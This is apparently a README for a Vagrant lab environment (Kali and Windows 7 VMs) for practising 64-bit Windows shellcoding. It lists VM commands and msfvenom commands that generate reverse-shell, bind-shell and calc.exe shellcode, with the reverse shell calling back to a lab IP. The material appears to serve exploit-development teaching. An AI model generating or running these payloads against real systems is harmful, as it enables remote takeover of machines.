# ⚔️ Implementation of One-Way Shellcoding in Windows 64bit Systems ## Vagrant Commands ### To start the environment ``` vagrant up ``` ### To shutdown the environment ``` vagrant halt ``` ### To reload the environment ``` vagrant reload ``` ### To destroy the environment ``` vagrant destroy ``` ## Payloads ### windows x64 reverse shell ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.33.100 LPORT=8888 -f c ``` ### windows x64 calculator shell ``` msfvenom -p windows/x64/exec CMD=calc.exe -f c ``` ### windows x64 bind shell ``` msfvenom -p windows/x64/shell_bind_tcp EXITFUNC=thread LPORT=4444 -f c ``` ## 💡 Tips * To copy any data into the Virtual Machines, place the files in the root folder of the repository at the laptop. _* The files can then be accessed from the /vagrant/ (in Kali) or C:/vagrant/ (in Windows7) *_ * If the virtualbox VM's display is very small. Select the "View" in the menu -> "Virtual Screen 1" option -> "Scale to 200%" option. ###### tags: `shellcoding` `exploit-dev` `64bit` `windows`